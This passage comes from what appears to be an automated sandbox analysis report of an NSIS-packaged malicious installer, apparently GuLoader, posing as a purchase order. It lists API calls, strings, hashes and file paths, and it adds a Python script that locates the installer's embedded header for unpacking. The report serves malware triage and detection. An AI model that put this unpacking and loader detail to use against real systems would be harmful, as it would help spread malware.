                • Associated: 00000000.00000002.76393471413.0000000000789000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.76393471413.00000000007A4000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.76393471413.00000000007A6000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.76393471413.00000000007AA000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.76393471413.00000000007AC000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.76393471413.00000000007B3000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.76393471413.00000000007C2000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.76394616110.00000000007C5000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.76394616110.00000000007C8000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.76394616110.0000000000805000.00000002.00000001.01000000.00000003.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_400000_PO Tournefortian2453525525235235623425523235.jbxd
                Similarity
                • API ID: FileFind$lstrcat$CloseDeleteFirstNextlstrlen
                • String ID: .$.$C:\Users\user\AppData\Local\Temp\$P?z$\*.*
                • API String ID: 2035342205-314529707
                • Opcode ID: 86a9ea6cbb14b57aebf4225f9df046bf70f97581db132fea7010d611e8ef0d07
                • Instruction ID: 717efa72a3eb519caeee53ac910e89dbb8479b941b5c6030fce336447c755aae
                • Opcode Fuzzy Hash: 86a9ea6cbb14b57aebf4225f9df046bf70f97581db132fea7010d611e8ef0d07
                • Instruction Fuzzy Hash: C341B230800A14BADB21AB659D8DAAF7778DF85718F24813FF401751D1D77C4A82DE6E

                Control-flow Graph

                (Function at 406850, basic blocks 609 to 612; rendered as an interactive graph in the original report, reproduced here as a block list with successors.)
                • Block 609, 406850-406864: calls FindFirstFileW; branches to block 610 or block 611
                • Block 610, 406871: continues to block 612
                • Block 611, 406866-40686f: calls FindClose; continues to block 612
                • Block 612, 406873-406874: no successors
                APIs
                • FindFirstFileW.KERNELBASE(?,007A4F98,C:\Users\user\AppData\Local\Temp\nstDD9E.tmp,00405F3A,C:\Users\user\AppData\Local\Temp\nstDD9E.tmp,C:\Users\user\AppData\Local\Temp\nstDD9E.tmp,00000000,C:\Users\user\AppData\Local\Temp\nstDD9E.tmp,C:\Users\user\AppData\Local\Temp\nstDD9E.tmp,?,?,C:\Users\user\AppData\Local\Temp\,00405C46,?,76A13420,C:\Users\user\AppData\Local\Temp\), ref: 0040685B
                • FindClose.KERNEL32(00000000), ref: 00406867
                Strings
                • C:\Users\user\AppData\Local\Temp\nstDD9E.tmp, xrefs: 00406850
                Memory Dump Source
                • Source File: 00000000.00000002.76393379189.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000000.00000002.76393328316.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.76393436615.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.76393471413.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.76393471413.000000000077C000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.76393471413.0000000000782000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.76393471413.0000000000786000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.76393471413.0000000000789000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.76393471413.00000000007A4000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.76393471413.00000000007A6000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.76393471413.00000000007AA000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.76393471413.00000000007AC000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.76393471413.00000000007B3000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.76393471413.00000000007C2000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.76394616110.00000000007C5000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.76394616110.00000000007C8000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.76394616110.0000000000805000.00000002.00000001.01000000.00000003.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_400000_PO Tournefortian2453525525235235623425523235.jbxd
                Similarity
                • API ID: Find$CloseFileFirst
                • String ID: C:\Users\user\AppData\Local\Temp\nstDD9E.tmp
                • API String ID: 2295610775-2038086183
                • Opcode ID: 93d274fea3e94b44f6f55b1f097fc665565d90e42f153d0ad468ae4ce1295179
                • Instruction ID: 4aa2ce40dd0fdaaf15299f79bbf0ddad0ee07bd1ec444a92f9406ee76b8f93c8
                • Opcode Fuzzy Hash: 93d274fea3e94b44f6f55b1f097fc665565d90e42f153d0ad468ae4ce1295179
                • Instruction Fuzzy Hash: 3CD012365592205FC7402779AE0CC4B7A689F563313268B36B0EAF11F0CA74CC3296ED

                Control-flow Graph

                (Function at 403f77, basic blocks 143 to 249 covering 403f77-40444c. The basic-block edge list was rendered as an interactive graph in the original report, with executed and non-executed blocks distinguished, and is not reproduced here; the Windows APIs called from these blocks are listed under APIs below.)
                APIs
                • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000013), ref: 00403FB3
                • ShowWindow.USER32(?), ref: 00403FD3
                • GetWindowLongW.USER32(?,000000F0), ref: 00403FE5
                • ShowWindow.USER32(?,00000004), ref: 00403FFE
                • DestroyWindow.USER32 ref: 00404012
                • SetWindowLongW.USER32(?,00000000,00000000), ref: 0040402B
                • GetDlgItem.USER32(?,?), ref: 0040404A
                • SendMessageW.USER32(00000000,000000F3,00000000,00000000), ref: 0040405E
                • IsWindowEnabled.USER32(00000000), ref: 00404065
                • GetDlgItem.USER32(?,00000001), ref: 00404110
                • GetDlgItem.USER32(?,00000002), ref: 0040411A
                • SetClassLongW.USER32(?,000000F2,?), ref: 00404134
                • SendMessageW.USER32(0000040F,00000000,00000001,?), ref: 00404185
                • GetDlgItem.USER32(?,00000003), ref: 0040422B
                • ShowWindow.USER32(00000000,?), ref: 0040424C
                • KiUserCallbackDispatcher.NTDLL(?,?), ref: 0040425E
                • EnableWindow.USER32(?,?), ref: 00404279
                • GetSystemMenu.USER32(?,00000000,0000F060,00000001), ref: 0040428F
                • EnableMenuItem.USER32(00000000), ref: 00404296
                • SendMessageW.USER32(?,000000F4,00000000,00000001), ref: 004042AE
                • SendMessageW.USER32(?,00000401,00000002,00000000), ref: 004042C1
                • lstrlenW.KERNEL32(007A1F48,?,007A1F48,00000000), ref: 004042EB
                • SetWindowTextW.USER32(?,007A1F48), ref: 004042FF
                • ShowWindow.USER32(?,0000000A), ref: 00404433
                Memory Dump Source
                • Source File: 00000000.00000002.76393379189.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000000.00000002.76393328316.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.76393436615.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.76393471413.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.76393471413.000000000077C000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.76393471413.0000000000782000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.76393471413.0000000000786000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.76393471413.0000000000789000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.76393471413.00000000007A4000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.76393471413.00000000007A6000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.76393471413.00000000007AA000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.76393471413.00000000007AC000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.76393471413.00000000007B3000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.76393471413.00000000007C2000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.76394616110.00000000007C5000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.76394616110.00000000007C8000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.76394616110.0000000000805000.00000002.00000001.01000000.00000003.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_400000_PO Tournefortian2453525525235235623425523235.jbxd
                Similarity
                • API ID: Window$Item$MessageSendShow$Long$EnableMenu$CallbackClassDestroyDispatcherEnabledSystemTextUserlstrlen
                • String ID:
                • API String ID: 121052019-0
                • Opcode ID: 6aca1bad72cfddba572d633407a978d295c4fb80144ed58a8fa15c5a1abdb00b
                • Instruction ID: a523085d0bb4d20675d087507fe11aed99bae63dd77e7307ea40df4209393f8b
                • Opcode Fuzzy Hash: 6aca1bad72cfddba572d633407a978d295c4fb80144ed58a8fa15c5a1abdb00b
                • Instruction Fuzzy Hash: 7FC1CEB1500604ABDB206F21ED85E2A3A69FBC6709F00853EF791B25E0CB3D5851DB6E

                Control-flow Graph (interactive graph omitted; blocks were coloured executed / not executed)
                • Entry block: 403bc9
                • Windows APIs reached in this graph: lstrcatW, lstrlenW, lstrcmpiW, GetFileAttributesW, LoadImageW, RegisterClassW, SystemParametersInfoW, CreateWindowExW, ShowWindow, GetClassInfoW, DialogBoxParamW
                • Internal calls: 4068e7, 406461, 4063e8, 403e9f, 405ef1, 406557, 40140b, 405e16, 405de9, 40651a, 405e35, 406877, 40564f, 403b19
                APIs
                  • Part of subcall function 004068E7: GetModuleHandleA.KERNEL32(?,00000020,?,0040361A,0000000B), ref: 004068F9
                  • Part of subcall function 004068E7: GetProcAddress.KERNEL32(00000000,?), ref: 00406914
                • lstrcatW.KERNEL32(1033,007A1F48), ref: 00403C4A
                • lstrlenW.KERNEL32(: Completed,?,?,?,: Completed,00000000,C:\Users\user\AppData\Local\efterplaprernes\Shakya\memorized,1033,007A1F48,80000001,Control Panel\Desktop\ResourceLocale,00000000,007A1F48,00000000,00000002,76A13420), ref: 00403CCA
                • lstrcmpiW.KERNEL32(?,.exe,: Completed,?,?,?,: Completed,00000000,C:\Users\user\AppData\Local\efterplaprernes\Shakya\memorized,1033,007A1F48,80000001,Control Panel\Desktop\ResourceLocale,00000000,007A1F48,00000000), ref: 00403CDD
                • GetFileAttributesW.KERNEL32(: Completed,?,00000000), ref: 00403CE8
                • LoadImageW.USER32(00000067,00000001,00000000,00000000,00008040,C:\Users\user\AppData\Local\efterplaprernes\Shakya\memorized), ref: 00403D31
                  • Part of subcall function 00406461: wsprintfW.USER32 ref: 0040646E
                • RegisterClassW.USER32(007A7A00), ref: 00403D6E
                • SystemParametersInfoW.USER32(00000030,00000000,?,00000000), ref: 00403D86
                • CreateWindowExW.USER32(00000080,_Nb,00000000,80000000,?,?,?,?,00000000,00000000,00000000), ref: 00403DBB
                • ShowWindow.USER32(00000005,00000000), ref: 00403DF1
                • GetClassInfoW.USER32(00000000,RichEdit20W,007A7A00), ref: 00403E1D
                • GetClassInfoW.USER32(00000000,RichEdit,007A7A00), ref: 00403E2A
                • RegisterClassW.USER32(007A7A00), ref: 00403E33
                • DialogBoxParamW.USER32(?,00000000,00403F77,00000000), ref: 00403E52
                Memory Dump Source
                • Source File: 00000000.00000002.76393379189.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                • Associated: same dump regions as listed above
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_400000_PO Tournefortian2453525525235235623425523235.jbxd
                Similarity
                • API ID: Class$Info$RegisterWindow$AddressAttributesCreateDialogFileHandleImageLoadModuleParamParametersProcShowSystemlstrcatlstrcmpilstrlenwsprintf
                • String ID: .DEFAULT\Control Panel\International$.exe$1033$: Completed$C:\Users\user\AppData\Local\Temp\$C:\Users\user\AppData\Local\efterplaprernes\Shakya\memorized$Control Panel\Desktop\ResourceLocale$RichEd20$RichEd32$RichEdit$RichEdit20W$_Nb
                • API String ID: 1975747703-228176641
                • Opcode ID: 42423043095f590123d158157c9694ce3389b6048a27da8bb4fe5db052cf961f
                • Instruction ID: 5e1ff83f83eb9308ce16c84110d2fcc5f4f6a1078aae304d5a5647478e66a4f2
                • Opcode Fuzzy Hash: 42423043095f590123d158157c9694ce3389b6048a27da8bb4fe5db052cf961f
                • Instruction Fuzzy Hash: 0661A270240700BAD320AB669D45F2B3A6CEBC5B49F40853FF942B26E1DB7D9901CB6D

                Control-flow Graph (interactive graph omitted; blocks were coloured executed / not executed)
                • Entry block: 40307d
                • Windows APIs reached in this graph: GetTickCount, GetModuleFileNameW, GetFileSize, GlobalAlloc, SetFilePointer
                • Internal calls: 40600a, 40651a, 405e35, 403019, 4034ac, 4034c2, 4032b4, 405fc5, 4069d4
                APIs
                • GetTickCount.KERNEL32 ref: 0040308E
                • GetModuleFileNameW.KERNEL32(00000000,C:\Users\user\Desktop\PO Tournefortian2453525525235235623425523235.exe,00000400), ref: 004030AA
                  • Part of subcall function 0040600A: GetFileAttributesW.KERNELBASE(?,004030BD,C:\Users\user\Desktop\PO Tournefortian2453525525235235623425523235.exe,80000000,00000003), ref: 0040600E
                  • Part of subcall function 0040600A: CreateFileW.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000), ref: 00406030
                • GetFileSize.KERNEL32(00000000,00000000,007B7000,00000000,C:\Users\user\Desktop,C:\Users\user\Desktop,C:\Users\user\Desktop\PO Tournefortian2453525525235235623425523235.exe,C:\Users\user\Desktop\PO Tournefortian2453525525235235623425523235.exe,80000000,00000003), ref: 004030F6
                • GlobalAlloc.KERNELBASE(00000040,?), ref: 0040322C
                Memory Dump Source
                • Source File: 00000000.00000002.76393379189.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                • Associated: same dump regions as listed above
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_400000_PO Tournefortian2453525525235235623425523235.jbxd
                Similarity
                • API ID: File$AllocAttributesCountCreateGlobalModuleNameSizeTick
                • String ID: 8]$<_$C:\Users\user\AppData\Local\Temp\$C:\Users\user\Desktop$C:\Users\user\Desktop\PO Tournefortian2453525525235235623425523235.exe$Error launching installer$Inst$Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author $Null$soft
                • API String ID: 2803837635-1024483750
                • Opcode ID: 228fa0226a90281b4f2baa84689300d30e54d034f1a820beff8a1dc93a475882
                • Instruction ID: 1f061f0c38a4f693c331b34270bc70c7c89456ffd71d5a2abe04866b7cb55e0c
                • Opcode Fuzzy Hash: 228fa0226a90281b4f2baa84689300d30e54d034f1a820beff8a1dc93a475882
                • Instruction Fuzzy Hash: 9551D071901204ABDB10AF65DD82B9E7FA8EB44756F10853BE501FA2C1CB7C8F418B5D
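                The routine at 0x40307d is recognisable as the NSIS stub's search for its own first header: it resolves its path with GetModuleFileNameW, opens and sizes the file, allocates a buffer with GlobalAlloc, repositions with SetFilePointer, and its string set carries the split magic "Null" / "soft" / "Inst" together with the "Installer integrity check has failed" and "Error launching installer" messages, so the submitted file is an NSIS-packaged installer. The following Python is an added triage example for this report, not code from the sample, from NSIS or from Joe Sandbox. The header field layout and constants are the public NSIS firstheader (Source/exehead/fileform.h); the 512-byte search stride and the CRC span (from file start up to the trailing four bytes) are taken from the NSIS stub source and assumed to apply to this sample, since the report shows only the API calls and strings, not the loop parameters. The installer image it runs on is constructed inside the block.

```python
"""Locate and check the NSIS first header that the stub routine at 0x40307d searches for.

Added triage example for this report; not code from the sample, from NSIS or from Joe Sandbox.
Field layout and constants follow the public NSIS firstheader (Source/exehead/fileform.h).
The 512-byte search stride and the CRC span (file start up to the trailing 4 bytes) are
taken from the NSIS stub source and assumed to match this sample.
"""
import struct
import zlib

FH_SIG = 0xDEADBEEF                     # firstheader.siginfo
FH_MAGIC = b"NullsoftInst"              # nsinst[3]: the split strings "Null", "soft", "Inst"
FH_FLAGS_MASK = 0x0F                    # UNINSTALL=1, SILENT=2, NO_CRC=4, FORCE_CRC=8
FH_FLAGS_NO_CRC = 0x04
FLAG_NAMES = {1: "UNINSTALL", 2: "SILENT", 4: "NO_CRC", 8: "FORCE_CRC"}
FH_STRUCT = struct.Struct("<IIIIIII")   # flags, siginfo, nsinst[3], header_len, following_len
SEARCH_STRIDE = 512                     # assumption: header is tested at 512-byte-aligned offsets


def find_first_header(data: bytes):
    """Return (offset, fields) of the first plausible NSIS firstheader, or None."""
    for off in range(0, len(data) - FH_STRUCT.size + 1, SEARCH_STRIDE):
        flags, sig, n1, n2, n3, header_len, following_len = FH_STRUCT.unpack_from(data, off)
        if sig != FH_SIG or struct.pack("<III", n1, n2, n3) != FH_MAGIC:
            continue
        if flags & ~FH_FLAGS_MASK:              # bits outside the mask: not a real header
            continue
        if following_len > len(data) - off:     # claims more data than the file contains
            continue
        return off, {"flags": flags, "header_len": header_len, "following_len": following_len}
    return None


def verify_crc(data: bytes, off: int, following_len: int) -> bool:
    """The check behind 'Installer integrity check has failed': CRC-32 of everything from
    file start up to the last 4 bytes of the installer, compared with those 4 bytes."""
    end = off + following_len
    expected = struct.unpack_from("<I", data, end - 4)[0]
    return (zlib.crc32(data[:end - 4]) & 0xFFFFFFFF) == expected


def triage(data: bytes):
    """Summarise where the embedded NSIS data lives and whether the stub would accept it."""
    found = find_first_header(data)
    if found is None:
        return None
    off, f = found
    has_crc = not (f["flags"] & FH_FLAGS_NO_CRC)   # makensis appends the CRC only when checking is on
    return {
        "header_offset": off,
        "flags": [name for bit, name in FLAG_NAMES.items() if f["flags"] & bit],
        "data_offset": off + FH_STRUCT.size,          # start of the (compressed) header + data blocks
        "data_end": off + f["following_len"] - (4 if has_crc else 0),
        "crc_ok": verify_crc(data, off, f["following_len"]) if has_crc else None,
    }


def build_sample(payload: bytes, corrupt_crc: bool = False) -> bytes:
    """Constructed test image, not a real installer: a fake 1 KiB stub holding a decoy header
    with garbage flags at offset 512, the real firstheader at 1024, an uncompressed stand-in
    for the header block, the payload, and the trailing CRC-32."""
    magic = struct.unpack("<III", FH_MAGIC)
    decoy = FH_STRUCT.pack(0xFFFFFFFF, FH_SIG, *magic, 0, 0)
    stub = b"MZ" + b"\0" * 510 + decoy + b"\0" * (512 - len(decoy))
    header_block = b"H" * 64
    following_len = FH_STRUCT.size + len(header_block) + len(payload) + 4
    fh = FH_STRUCT.pack(0x08, FH_SIG, *magic, len(header_block), following_len)  # FORCE_CRC set
    image = stub + fh + header_block + payload
    crc = zlib.crc32(image) & 0xFFFFFFFF
    if corrupt_crc:
        crc ^= 1
    return image + struct.pack("<I", crc)


if __name__ == "__main__":
    print(triage(build_sample(b"P" * 300)))
    print(triage(build_sample(b"P" * 300, corrupt_crc=True))["crc_ok"])
```

                Feeding the submitted file to triage() gives the offset of the embedded header and data blocks, which is where an unpacker would start for a GuLoader-in-NSIS sample; a crc_ok of False is the path that produces the integrity-check message seen in this function's string set. The decoy in the constructed image shows why the stub masks the flags word: the magic alone is not enough to accept a header.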

                Control-flow Graph (interactive graph omitted; blocks were coloured executed / not executed)
                • Entry block: 406557
                • Windows APIs reached in this graph: lstrlenW, lstrcatW, GetSystemDirectoryW, GetWindowsDirectoryW, SHGetSpecialFolderLocation, SHGetPathFromIDListW, CoTaskMemFree
                • Internal calls: 40651a, 406461, 4063e8, 406557 (recursive), 4067a1
                APIs
                • GetSystemDirectoryW.KERNEL32(: Completed,00000400), ref: 00406672
                • GetWindowsDirectoryW.KERNEL32(: Completed,00000400,00000000,Completed,?), ref: 00406685
                • lstrcatW.KERNEL32(: Completed,\Microsoft\Internet Explorer\Quick Launch), ref: 004066FC
                • lstrlenW.KERNEL32(: Completed,00000000,Completed,?), ref: 00406756
                Memory Dump Source
                • Source File: 00000000.00000002.76393379189.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                • Associated: same dump regions as listed above
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_400000_PO Tournefortian2453525525235235623425523235.jbxd
                Similarity
                • API ID: Directory$SystemWindowslstrcatlstrlen
                • String ID: : Completed$Completed$Software\Microsoft\Windows\CurrentVersion$\Microsoft\Internet Explorer\Quick Launch
                • API String ID: 4260037668-905382516
                • Opcode ID: 0bfb1de96e7ab8e04267686189d0a2fdc9a7ea5f11b2228fd78f9f9797911f1b
                • Instruction ID: 9e459ffa4d797bbc81f49b8710fc234ac44c95668d32beb4df18aeb57a87e6f9
                • Opcode Fuzzy Hash: 0bfb1de96e7ab8e04267686189d0a2fdc9a7ea5f11b2228fd78f9f9797911f1b
                • Instruction Fuzzy Hash: E061D271900206AADF109F64DC40BAE37A5AF55318F22C13BE917B72D0DB7D8AA1CB5D

                Control-flow Graph (interactive graph omitted; blocks were coloured executed / not executed)
                • Entry block: 40557c
                • Windows APIs reached in this graph: lstrlenW, lstrcatW, SetWindowTextW, SendMessageW (three calls)
                • Internal calls: 406557
                APIs
                • lstrlenW.KERNEL32(Completed,00000000,00798D72,76A123A0), ref: 004055B4
                • lstrlenW.KERNEL32(?,Completed,00000000,00798D72,76A123A0), ref: 004055C4
                • lstrcatW.KERNEL32(Completed,?), ref: 004055D7
                • SetWindowTextW.USER32(Completed,Completed), ref: 004055E9
                • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 0040560F
                • SendMessageW.USER32(?,0000104D,00000000,?), ref: 00405629
                • SendMessageW.USER32(?,00001013,?,00000000), ref: 00405637
                  • Part of subcall function 00406557: lstrcatW.KERNEL32(: Completed,\Microsoft\Internet Explorer\Quick Launch), ref: 004066FC
                  • Part of subcall function 00406557: lstrlenW.KERNEL32(: Completed,00000000,Completed,?), ref: 00406756
                Memory Dump Source
                • Source File: 00000000.00000002.76393379189.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                • Associated: same dump regions as listed above
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_400000_PO Tournefortian2453525525235235623425523235.jbxd
                Similarity
                • API ID: MessageSendlstrlen$lstrcat$TextWindow
                • String ID: Completed
                • API String ID: 1495540970-3087654605
                • Opcode ID: e72b446f7cf09937869db058bf2a19fb3413a9df614dab038018dab8610e28cd
                • Instruction ID: aa9a416d1108715588902b7fd38edda494bf3b6dcc64e7638c7e5b3a5377cb21
                • Opcode Fuzzy Hash: e72b446f7cf09937869db058bf2a19fb3413a9df614dab038018dab8610e28cd
                • Instruction Fuzzy Hash: F7218071900518BACF119F69ED449CFBF79EF49750F10803AF944B62A0C7794A40CFA8

                Control-flow Graph (interactive graph omitted; blocks were coloured executed / not executed)
                • Entry block: 4032b4
                • Windows APIs reached in this graph: GetTickCount, MulDiv, wsprintfW
                • Internal calls: 4034ac, 4034c2, 4060bc, 406a42, 40557c
                Memory Dump Source
                • Source File: 00000000.00000002.76393379189.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                • Associated: same dump regions as listed above
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_400000_PO Tournefortian2453525525235235623425523235.jbxd
                Similarity
                • API ID: CountTick$wsprintf
                • String ID: ... %d%%$}Hy
                • API String ID: 551687249-2138383442
                • Opcode ID: 67e296ff4565807106035eaab5f2577f851fd332784b09125895019d099d7f68
                • Instruction ID: 2eef5f2140e491494c2db8857c7661a7403dfcbdcc622e4f150acafc5917097d
                • Opcode Fuzzy Hash: 67e296ff4565807106035eaab5f2577f851fd332784b09125895019d099d7f68
                • Instruction Fuzzy Hash: 59516C71800219EBDB11DF55DA84B9E7FB8AF40326F14417BE814BA2C1D7789F408BAA

                Control-flow Graph (interactive graph omitted; blocks were coloured executed / not executed)
                • Entry block: 406877
                • Windows APIs reached in this graph: GetSystemDirectoryW, wsprintfW, LoadLibraryExW
                • Internal calls: none
                APIs
                • GetSystemDirectoryW.KERNEL32(?,00000104), ref: 0040688E
                • wsprintfW.USER32 ref: 004068C9
                • LoadLibraryExW.KERNELBASE(?,00000000,00000008), ref: 004068DD
                Memory Dump Source
                • Source File: 00000000.00000002.76393379189.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                • Associated: same dump regions as listed above
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_400000_PO Tournefortian2453525525235235623425523235.jbxd
                Similarity
                • API ID: DirectoryLibraryLoadSystemwsprintf
                • String ID: %s%S.dll$UXTHEME$\
                • API String ID: 2200240437-1946221925
                • Opcode ID: 70474fd7a4f9c0ba06a591290262a653731ba096fd3a0e6ffa6d52d828e9795f
                • Instruction ID: cdb972a85fe13f574061c7118b8c5d4b466341d866a79bb5796beb4354b5a6e3
                • Opcode Fuzzy Hash: 70474fd7a4f9c0ba06a591290262a653731ba096fd3a0e6ffa6d52d828e9795f
                • Instruction Fuzzy Hash: E9F0F671511119A7DF10BB64DD0DF9B376CAF00305F11447AAA46F10E0EB7CDA68CBA8

Control-flow Graph (basic blocks as node: address range, API calls -> successor nodes; legend: Executed / Not Executed)
                • 597: 405a4b-405a96 CreateDirectoryW -> 598, 599
                • 598: 405a98-405a9a -> 600
                • 599: 405a9c-405aa9 GetLastError -> 600, 601
                • 600: 405ac3-405ac5
                • 601: 405aab-405abf SetFileSecurityW -> 598, 602
                • 602: 405ac1 GetLastError -> 600
                APIs
                • CreateDirectoryW.KERNELBASE(?,?,C:\Users\user\AppData\Local\Temp\), ref: 00405A8E
                • GetLastError.KERNEL32 ref: 00405AA2
                • SetFileSecurityW.ADVAPI32(?,80000007,?), ref: 00405AB7
                • GetLastError.KERNEL32 ref: 00405AC1
                Strings
                • C:\Users\user\AppData\Local\Temp\, xrefs: 00405A71
                Memory Dump Source
                • Source File: 00000000.00000002.76393379189.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_400000_PO Tournefortian2453525525235235623425523235.jbxd
                Similarity
                • API ID: ErrorLast$CreateDirectoryFileSecurity
                • String ID: C:\Users\user\AppData\Local\Temp\
                • API String ID: 3449924974-3355392842
                • Opcode ID: 79915fdb32ce531948ad707932686e2b3240d3ac97543659e1c0f9af800e449c
                • Instruction ID: 6b4cde1861b350949670c47dbaa51c368922036badf300449d23a0f4a4187d7a
                • Opcode Fuzzy Hash: 79915fdb32ce531948ad707932686e2b3240d3ac97543659e1c0f9af800e449c
                • Instruction Fuzzy Hash: D0010871D10219EADF109BA0C984BEFBFB4EB04314F04853AD545B6180D77896488FA9

Control-flow Graph (basic blocks as node: address range, API calls -> successor nodes; legend: Executed / Not Executed)
                • 603: 406039-406045 -> 604
                • 604: 406046-40607a GetTickCount GetTempFileNameW -> 605, 606
                • 605: 406089-40608b -> 608
                • 606: 40607c-40607e -> 604, 607
                • 607: 406080 -> 608
                • 608: 406083-406086
                APIs
                • GetTickCount.KERNEL32 ref: 00406057
                • GetTempFileNameW.KERNELBASE(?,?,00000000,?,?,?,?,00403508,1033,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,004037ED), ref: 00406072
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.76393379189.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_400000_PO Tournefortian2453525525235235623425523235.jbxd
                Similarity
                • API ID: CountFileNameTempTick
                • String ID: C:\Users\user\AppData\Local\Temp\$nsa
                • API String ID: 1716503409-944333549
                • Opcode ID: 418a87fb760587bef7583f4f3acae06d17b3011fc99645d3e11ea5bfcaa5fca8
                • Instruction ID: d9a4429216a2c16f2b1e0ff0632edab8c7003fcac11a898ec3991e0c35e2d836
                • Opcode Fuzzy Hash: 418a87fb760587bef7583f4f3acae06d17b3011fc99645d3e11ea5bfcaa5fca8
                • Instruction Fuzzy Hash: 84F0F076B40204BFEB00CF59ED05E9EB7ACEB95750F01803AEE45F3140E6B099648768

Control-flow Graph (basic blocks as node: address range, calls -> successor nodes; legend: Executed / Not Executed)
                • 613: 401389-40138e -> 614
                • 614: 4013fa-4013fc -> 615, 616
                • 615: 401390-4013a0 -> 616, 618
                • 616: 4013fe -> 617
                • 617: 401400-401401
                • 618: 4013a2-4013ad call 401434 -> 621, 622
                • 621: 401404-401409 -> 617
                • 622: 4013af-4013b7 call 40136d -> 625, 626
                • 625: 4013b9-4013bb -> 627
                • 626: 4013bd-4013c2 -> 627
                • 627: 4013c4-4013c9 -> 614, 628
                • 628: 4013cb-4013f4 MulDiv SendMessageW -> 614
                APIs
                • MulDiv.KERNEL32(00007530,00000000,00000000), ref: 004013E4
                • SendMessageW.USER32(?,00000402,00000000), ref: 004013F4
                Memory Dump Source
                • Source File: 00000000.00000002.76393379189.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_400000_PO Tournefortian2453525525235235623425523235.jbxd
                Similarity
                • API ID: MessageSend
                • String ID:
                • API String ID: 3850602802-0
                • Opcode ID: 0f992e2ae6cf3b1b8dd96a4b6b0adf3515dff43e38b3359cc4322e8ed16e10f0
